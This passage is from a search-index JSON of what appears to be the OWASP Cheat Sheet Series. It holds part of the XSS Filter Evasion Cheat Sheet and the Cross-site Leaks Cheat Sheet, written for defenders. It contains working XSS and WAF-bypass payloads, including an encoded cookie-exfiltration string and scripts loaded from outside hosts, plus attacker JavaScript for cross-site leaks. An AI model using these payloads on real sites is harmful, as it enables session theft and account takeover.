If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:

<OBJECT\u00a0TYPE=\"text/x-scriptlet\"\u00a0DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embed-a-flash-movie-that-contains-xss","title":"EMBED a Flash Movie That Contains XSS","text":"

Click here for a demo: ~~http://ha.ckers.org/xss.swf~~

<EMBED\u00a0SRC=\"http://ha.ckers.org/xss.swf\"\u00a0AllowScriptAccess=\"always\"></EMBED>

If you add the attributes allowScriptAccess=\"never\" and allownetworking=\"internal\" it can mitigate this risk (thank you to Jonathan Vanasco for the info).

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embed-svg-which-contains-xss-vector","title":"EMBED SVG Which Contains XSS Vector","text":"

This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.

<EMBED\u00a0SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH\u00a0A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv\u00a0MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs\u00a0aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\u00a0IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh\u00a0TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"\u00a0type=\"image/svg+xml\"\u00a0AllowScriptAccess=\"always\"></EMBED>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#using-actionscript-inside-flash-for-obfuscation","title":"Using ActionScript Inside Flash for Obfuscation","text":"
a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"alert('XSS');\\\")\"; \neval(a+b+c+d);\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xml-data-island-with-cdata-obfuscation","title":"XML Data Island with CDATA Obfuscation","text":"

This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:

<XML\u00a0ID=\"xss\"><I><B><IMG\u00a0SRC=\"javas<!--\u00a0-->cript:alert('XSS')\"></B></I></XML> \n<SPAN\u00a0DATASRC=\"#xss\"\u00a0DATAFLD=\"B\"\u00a0DATAFORMATAS=\"HTML\"></SPAN>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#locally-hosted-xml-with-embedded-javascript-that-is-generated-using-an-xml-data-island","title":"Locally hosted XML with embedded JavaScript that is generated using an XML data island","text":"

This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:

<XML\u00a0SRC=\"xsstest.xml\"\u00a0ID=I></XML>  \n<SPAN\u00a0DATASRC=#I\u00a0DATAFLD=C\u00a0DATAFORMATAS=HTML></SPAN>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#htmltime-in-xml","title":"HTML+TIME in XML","text":"

This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:

<HTML><BODY>\n<?xml:namespace\u00a0prefix=\"t\"\u00a0ns=\"urn:schemas-microsoft-com:time\">\n<?import\u00a0namespace=\"t\"\u00a0implementation=\"#default#time2\">\n<t:set\u00a0attributeName=\"innerHTML\"\u00a0to=\"XSS<SCRIPT\u00a0DEFER>alert(\"XSS\")</SCRIPT>\">\n</BODY></HTML>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#assuming-you-can-only-fit-in-a-few-characters-and-it-filters-against-js","title":"Assuming you can only fit in a few characters and it filters against .js","text":"

You can rename your JavaScript file to an image as an XSS vector:

<SCRIPT\u00a0SRC=\"http://xss.rocks/xss.jpg\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ssi-server-side-includes","title":"SSI (Server Side Includes)","text":"

This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:

<!--#exec\u00a0cmd=\"/bin/echo\u00a0'<SCR'\"--><!--#exec\u00a0cmd=\"/bin/echo\u00a0'IPT\u00a0SRC=http://xss.rocks/xss.js></SCRIPT>'\"-->

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#php","title":"PHP","text":"

Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:

<?\u00a0echo('<SCR)';\necho('IPT>alert(\"XSS\")</SCRIPT>');\u00a0?>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-embedded-commands","title":"IMG Embedded Commands","text":"

This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:

<IMG\u00a0SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-embedded-commands-part-ii","title":"IMG Embedded Commands part II","text":"

This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=\"httx://badguy.com/a.jpg\"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):

Redirect\u00a0302\u00a0/a.jpg\u00a0http://victimsite.com/admin.asp&deleteuser

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#cookie-manipulation","title":"Cookie Manipulation","text":"

Admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):

<META\u00a0HTTP-EQUIV=\"Set-Cookie\"\u00a0Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#utf-7-encoding","title":"UTF-7 Encoding","text":"

If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:

<HEAD><META\u00a0HTTP-EQUIV=\"CONTENT-TYPE\"\u00a0CONTENT=\"text/html;\u00a0charset=UTF-7\">\u00a0</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-using-html-quote-encapsulation","title":"XSS Using HTML Quote Encapsulation","text":"

This was tested in IE, your mileage may vary. For performing XSS on sites that allow <SCRIPT> but don't allow <SCRIPT SRC... by way of a regex filter /\\<script\\[^\\>\\]+src/i:

<SCRIPT\u00a0a=\">\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

For performing XSS on sites that allow <SCRIPT> but don't allow \\<script src... by way of a regex filter /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i (this is an important one, because I've seen this regex in the wild):

<SCRIPT\u00a0=\">\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i:

<SCRIPT\u00a0a=\">\"\u00a0''\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Yet another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i. I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT> tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):

<SCRIPT\u00a0\"a='>'\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

And one last XSS attack to evade, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i using grave accents (again, doesn't work in Firefox):

<SCRIPT\u00a0a=>SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:

<SCRIPT\u00a0a=\">'>\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:

<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#url-string-evasion","title":"URL String Evasion","text":"

Assuming http://www.google.com/ is programmatically disallowed:

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ip-versus-hostname","title":"IP Versus Hostname","text":"

<A\u00a0HREF=\"http://66.102.7.147/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#url-encoding","title":"URL Encoding","text":"

<A\u00a0HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#dword-encoding","title":"DWORD Encoding","text":"

Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details:

<A\u00a0HREF=\"http://1113982867/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#hex-encoding","title":"Hex Encoding","text":"

The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):

<A\u00a0HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#octal-encoding","title":"Octal Encoding","text":"

Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:

<A\u00a0HREF=\"http://0102.0146.0007.00000223/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#base64-encoding","title":"Base64 Encoding","text":"

<img\u00a0onload=\"eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#mixed-encoding","title":"Mixed Encoding","text":"

Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:

<A\u00a0HREF=\"h \ntt\u00a0\u00a0p://6   6.000146.0x7.147/\">XSS</A>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#protocol-resolution-bypass","title":"Protocol Resolution Bypass","text":"

// translates to http:// which saves a few more bytes. This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like (ht|f)tp(s)?:// (thanks to Ozh for part of this one). You can also change the // to \\\\\\\\. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.

<A\u00a0HREF=\"//www.google.com/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-1","title":"Google \"feeling lucky\" part 1","text":"

Firefox uses Google's \"feeling lucky\" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's keyword: protocol. You can concatenate several keywords by using something like the following keyword:XSS+RSnake for instance. This no longer works within Firefox as of 2.0.

<A\u00a0HREF=\"//google\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-2","title":"Google \"feeling lucky\" part 2","text":"

This uses a very tiny trick that appears to work Firefox only, because of it's implementation of the \"feeling lucky\" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:

<A\u00a0HREF=\"http://ha.ckers.org@google\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-3","title":"Google \"feeling lucky\" part 3","text":"

This uses a malformed URL that appears to work in Firefox and Opera only, because of their implementation of the \"feeling lucky\" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case \"google\"):

<A\u00a0HREF=\"http://google:ha.ckers.org\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#removing-cnames","title":"Removing CNAMEs","text":"

When combined with the above URL, removing www. will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):

<A\u00a0HREF=\"http://google.com/\">XSS</A>

Extra dot for absolute DNS:

<A\u00a0HREF=\"http://www.google.com./\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#javascript-link-location","title":"JavaScript Link Location","text":"

<A\u00a0HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-replace-as-attack-vector","title":"Content Replace as Attack Vector","text":"

Assuming http://www.google.com/ is programmatically replaced with nothing). I actually used a similar attack vector against several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: java&\\#x09;script: was converted into java script:, which renders in IE, Netscape 8.1+ in secure site mode and Opera):

<A\u00a0HREF=\"http://www.google.com/ogle.com/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#assisting-xss-with-http-parameter-pollution","title":"Assisting XSS with HTTP Parameter Pollution","text":"

Assume a content sharing flow on a web site is implemented as shown below. There is a \"Content\" page which includes some content provided by users and this page also includes a link to \"Share\" page which enables a user choose their favorite social sharing platform to share it on. Developers HTML encoded the \"title\" parameter in the \"Content\" page to prevent against XSS but for some reasons they didn't URL encoded this parameter to prevent from HTTP Parameter Pollution. Finally they decide that since content_type's value is a constant and will always be integer, they didn't encode or validate the content_type in the \"Share\" page.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-page-source-code","title":"Content Page Source Code","text":"

a href=\"/Share?content_type=1&title=<%=Encode.forHtmlAttribute(untrusted content title)%>\">Share</a>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#share-page-source-code","title":"Share Page Source Code","text":"
<script>\nvar contentType = <%=Request.getParameter(\"content_type\")%>;\nvar title = \"<%=Encode.forJavaScript(request.getParameter(\"title\"))%>\";\n...\n//some user agreement and sending to server logic might be here\n...\n</script>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-page-output","title":"Content Page Output","text":"

In this case if attacker set untrusted content title as \u201cThis is a regular title&content_type=1;alert(1)\u201d the link in \"Content\" page would be this:

<a href=\"/share?content_type=1&title=This is a regular title&amp;content_type=1;alert(1)\">Share</a>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#share-page-output","title":"Share Page Output","text":"

And in share page output could be this:

<script>\nvar contentType = 1; alert(1);\nvar title = \"This is a regular title\";\n\u2026\n//some user agreement and sending to server logic might be here\n\u2026\n</script>\n

As a result, in this example the main flaw is trusting the content_type in the \"Share\" page without proper encoding or validation. HTTP Parameter Pollution could increase impact of the XSS flaw by promoting it from a reflected XSS to a stored XSS.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#character-escape-sequences","title":"Character Escape Sequences","text":"

All the possible combinations of the character \"\\<\" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#methods-to-bypass-waf-cross-site-scripting","title":"Methods to Bypass WAF \u2013 Cross-Site Scripting","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#general-issues","title":"General issues","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#stored-xss","title":"Stored XSS","text":"

If an attacker managed to push XSS through the filter, WAF wouldn\u2019t be able to prevent the attack conduction.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#reflected-xss-in-javascript","title":"Reflected XSS in JavaScript","text":"
Example: <script> ... setTimeout(\\\\\"writetitle()\\\\\",$\\_GET\\[xss\\]) ... </script>\nExploitation:\u00a0/?xss=500);\u00a0alert(document.cookie);//\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#dom-based-xss","title":"DOM-based XSS","text":"
Example:\u00a0<script> ... eval($\\_GET\\[xss\\]); ... </script>\nExploitation:\u00a0/?xss=document.cookie\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-via-request-redirection","title":"XSS via request Redirection","text":"
...\nheader('Location:\u00a0'.$_GET['param']);\n...\n

As well as:

..\nheader('Refresh:\u00a00;\u00a0URL='.$_GET['param']); \n...\n

/?param=<javascript:alert(document.cookie>)

/?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#waf-bypass-strings-for-xss","title":"WAF ByPass Strings for XSS","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#filter-bypass-alert-obfuscation","title":"Filter Bypass Alert Obfuscation","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html","title":"Cross-site leaks Cheat Sheet","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article describes examples of attacks and defenses against cross-site leaks vulnerability (XS Leaks). Since this vulnerability is based on the core mechanism of modern web browsers, it's also called a browser side-channel attack. XS-Leaks attacks seek to exploit the fact of seemingly insignificant information that is exchanged in cross-site communications between sites. This information infers answers to the previously asked questions about the victim's user account. Please take a look at the examples provided below:

On the basis of such questions, the attacker might try to deduce the answers, depending on the application's context. In most cases, the answers will be in binary form (yes or no). The impact of this vulnerability depends strongly on the application's risk profile. Despite this, XS Leaks may pose a real threat to user privacy and anonymity.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attack-vector","title":"Attack vector","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#same-origin-policy-sop","title":"Same Origin Policy (SOP)","text":"

Before describing attacks, it's good to understand one of the most critical security mechanisms in browsers - The Same-origin Policy. A few key aspects:

Origin A Origin B Same origin? https://example.com http://sub.example.com No, different hosts https://example.com https://example.com:443 Yes! Implicit port in Origin A

Although the SOP principle protects us from accessing information in cross-origin communication, XS-Leaks attacks based on residual data can infer some information.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#samesite-cookies","title":"SameSite Cookies","text":"

The SameSite attribute of a cookie tells the browser whether it should include the cookie in the request from the other site. The SameSite attribute takes the following values:

It is worth mentioning here the attitude of Chromium based browsers in which cookies without SameSite attribute set by default are treated as Lax.

SameSite cookies are a strong defense-in-depth mechanism against some classes of XS Leaks and CSRF attacks, which can significantly reduce the attack surface, but may not completely cut them (see, e.g., window-based XS Leak attacks like frame counting and navigation).

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#how-do-we-know-that-two-sites-are-samesite","title":"How do we know that two sites are SameSite?","text":"

In the context of the SameSite attribute, we consider the site to be the combination of the TLD (top-level domain) and the domain name before it. For example:

Full URL Site (eTLD+1) https://example.com:443/data?query=test example.com

Why are we talking about eTLD+1 and not just TLD+1? It's because of domains like .github.io or .eu.org. Such parts are not atomic enough to be compared well. For this reason, a list of \"effective\" TLDs (eTLDs) was created and can be found here.

Sites that have the same eTLD+1 are considered SameSite, examples:

Origin A Origin B SameSite? https://example.com http://example.com Yes, schemes don't matter https://evil.net https://example.com No, different eTLD+1 https://sub.example.com https://data.example.com Yes, subdomains don't matter

For more information about SameSite, see the excellent article Understanding \"same-site\".

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-using-the-element-id-attribute","title":"Attacks using the element ID attribute","text":"

Elements in the DOM can have an ID attribute that is unique within the document. For example:

<button id=\"pro\">Pro account</button>\n

The browser will automatically focus on an element with a given ID if we append a hash to the URL, e.g. https://example.com#pro. What's more, the JavaScript focus event gets fired. The attacker may try to embed the application in the iframe with specific source on its own controlled page:

then add listener in main document for blur event (the opposite of focus). When the victim visits the attackers site, the blur event gets fired. The attacker will be able to conclude that the victim has a pro account.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#framing-protection","title":"Framing protection","text":"

If you don't need other origins to embed your application in a frame, you can consider using one of two mechanisms:

Setting up framing protection efficiently blocks the ability to embed your application in a frame on the attacker-controlled origin and protects from other attacks like Clickjacking.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata-sec-fetch-dest","title":"Fetch metadata (Sec-Fetch-Dest)","text":"

Sec-Fetch-Dest header provides us with a piece of information about what is the end goal of the request. This header is included automatically by the browser and is one of the headers within the Fetch Metadata standard.

With Sec-Fetch-Dest you can build effective own resource isolation policies, for example:

app.get('/', (req, res) => {\nif (req.get('Sec-Fetch-Dest') === 'iframe') {\nreturn res.sendStatus(403);\n}\nres.send({\nmessage: 'Hello!'\n});\n});\n

If you want to use headers from the Fetch Metadata standard, make sure that your users' browsers support this standard (you can check it here). Also, think about using the appropriate fallback in code if the Sec-Fetch-* header is not included in the request.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-based-on-error-events","title":"Attacks based on error events","text":"

Embedding from resources from other origins is generally allowed. For example, you can embed an image from another origin or even script on your page. What is not permitted is reading cross-origin resource due the SOP policy.

When the browser sends a request for a resource, the server processes the request and decides on the response e.g. (200 OK or 404 NOT FOUND). The browser receives the HTTP response and based on that, the appropriate JavaScript event is fired (onload or onerror).

In this way, we can try to load resources and, based on the response status, infer whether they exist or not in the context of the logged-in victim. Let's look at the following situation:

Given the above example, an attacker can use JavaScript on his controlled origin to guess the victim's ID by enumerating over all the values in a simple loop.

function checkId(id) {\nconst script = document.createElement('script');\nscript.src = `https://example.com/api/users/${id}`;\nscript.onload = () => {\nconsole.log(`Logged user id: ${id}`);\n};\ndocument.body.appendChild(script);\n}\n\n// Generate array [0, 1, ..., 40]\nconst ids = Array(41)\n.fill()\n.map((_, i) => i + 0);\n\nfor (const id of ids) {\ncheckId(id);\n}\n

Note that the attacker here does not care about reading the response body even though it would not be able to due to solid isolation mechanisms in browsers such as Cross-Origin Resource Blocking. All it needs is the success information it receives when the onload event fires.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_1","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#subresource-protection","title":"SubResource protection","text":"

In some cases, mechanism of special unique tokens may be implemented to protect our sensitive endpoints.

/api/users/1234?token=be930b8cfb5011eb9a030242ac130003\n

Although it is pretty effective, the solution generates a significant overhead in proper implementation.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata-sec-fetch-site","title":"Fetch metadata (Sec-Fetch-Site)","text":"

This header specifies where the request was sent from, and it takes the following values:

Like Sec-Fetch-Dest, this header is automatically appended by the browser to each request and is part of the Fetch Metadata standard. Example usage:

app.get('/api/users/:id', authorization, (req, res) => {\nif (req.get('Sec-Fetch-Site') === 'cross-site') {\nreturn res.sendStatus(403);\n}\n\n// ... more code\n\nreturn res.send({ id: 1234, name: 'John', role: 'admin' });\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#cross-origin-resource-policy-corp","title":"Cross-Origin-Resource-Policy (CORP)","text":"

If the server returns this header with the appropriate value, the browser will not load resources from our site or origin (even static images) in another application. Possible values:

Read more about CORP here.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-on-postmessage-communication","title":"Attacks on postMessage communication","text":"

Sometimes in controlled situations we would like, despite SOP, to exchange information between different origins. We can use the postMessage mechanism. See below example:

// Origin: http://example.com\nconst site = new URLSearchParams(window.location.search).get('site'); // https://evil.com\nconst popup = window.open(site);\npopup.postMessage('secret message!', '*');\n\n// Origin: https://evil.com\nwindow.addEventListener('message', e => {\nalert(e.data) // secret message! - leak\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_2","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#specify-strict-targetorigin","title":"Specify strict targetOrigin","text":"

To avoid situations like the one above, where an attacker manages to get the reference for a window to receive a message, always specify the exact targetOrigin in postMessage. Passing to the targetOrigin wildcard * causes any origin to receive the message.

// Origin: http://example.com\nconst site = new URLSearchParams(window.location.search).get('site'); // https://evil.com\nconst popup = window.open(site);\npopup.postMessage('secret message!', 'https://sub.example.com');\n\n// Origin: https://evil.com\nwindow.addEventListener('message', e => {\nalert(e.data) // no data!\n});\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#frame-counting-attacks","title":"Frame counting attacks","text":"

Information about the number of loaded frames in a window can be a source of leakage. Take for example an application that loads search results into a frame, if the results are empty then the frame does not appear.

An attacker can get information about the number of loaded frames in a window by counting the number of frames in a window.frames object.

So finally, an attacker can obtain the email list and, in a simple loop, open subsequent windows and count the number of frames. If the number of frames in the opened window is equal to 1, the email is in the client's database of the application used by the victim.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_3","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#cross-origin-opener-policy-coop","title":"Cross-Origin-Opener-Policy (COOP)","text":"

Setting this header will prevent cross-origin documents from opening in the same browsing context group. This solution ensures that document A opening another document will not have access to the window object. Possible values:

In case the server returns for example same-origin COOP header, the attack fails:

const win = window.open('https://example.com/admin/customers?search=john%40example.com');\nconsole.log(win.frames.length) // Cannot read property 'length' of null\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#attacks-using-browser-cache","title":"Attacks using browser cache","text":"

Browser cache helps to significantly reduce the time it takes for a page to load when revisited. However, it can also pose a risk of information leakage. If an attacker is able to detect whether a resource was loaded from the cache after the load time, he will be able to draw some conclusions based on it.

The principle is simple, a resource loaded from cache memory will load incomparably faster than from the server.

An attacker can embed a resource on their site that is only accessible to a user with the admin role. Then, using JavaScript, read the load time of a particular resource and, based on this information, deduce whether the resource is in cache or not.

    // Threshold above which we consider a resource to have loaded from the server\n// const THRESHOLD = ...\n\nconst adminImagePerfEntry = window.performance\n.getEntries()\n.filter((entry) => entry.name.endsWith('admin.svg'));\n\nif (adminImagePerfEntry.duration < THRESHOLD) {\nconsole.log('Image loaded from cache!')\n}\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#defense_4","title":"Defense","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#unpredictable-tokens-for-images","title":"Unpredictable tokens for images","text":"

This technique is accurate when the user wants the resources to still be cached, while an attacker will not be able to find out about it.

/avatars/admin.svg?token=be930b8cfb5011eb9a030242ac130003\n
"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#using-the-cache-control-header","title":"Using the Cache-Control header","text":"

You can disable the cache mechanism if you accept the degraded performance related to the necessity of reloading resources from the server every time a user visits the site. To disable caching for resources you want to protect, set the response header Cache-Control: no-store.

"},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#quick-recommendations","title":"Quick recommendations","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#xs-leaks","title":"XS Leaks","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#fetch-metadata","title":"Fetch Metadata","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#framing-protection_1","title":"Framing protection","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#samesite","title":"SameSite","text":""},{"location":"cheatsheets/XS_Leaks_Cheat_Sheet.html#coop-and-corp-header","title":"COOP and CORP header","text":""}]} \ No newline at end of file +{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"index.html","title":"Introduction","text":"

The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics. These cheat sheets were created by various application security professionals who have expertise in specific topics.

